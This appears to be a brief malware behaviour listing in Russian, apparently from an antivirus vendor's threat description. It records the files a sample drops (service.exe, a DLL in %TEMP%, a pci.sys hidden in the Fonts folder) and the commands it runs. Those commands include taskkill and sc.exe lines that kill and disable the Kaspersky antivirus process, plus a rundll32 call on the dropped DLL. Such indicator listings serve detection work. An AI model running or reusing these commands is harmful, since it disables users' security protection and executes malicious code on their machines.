Техническая информация
- 'C:\service.exe'
- 'C:\services.exe'
- '<SYSTEM32>\taskkill.exe' /f /t /im avp.exe
- '<SYSTEM32>\sc.exe' config avp start= disabled
- '<SYSTEM32>\rundll32.exe' %TEMP%\194125.dll testall
- %TEMP%\194125.dll
- %WINDIR%\Fonts\pci.sys
- C:\services.exe
- C:\service.exe
- %WINDIR%\Fonts\pci.sys
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''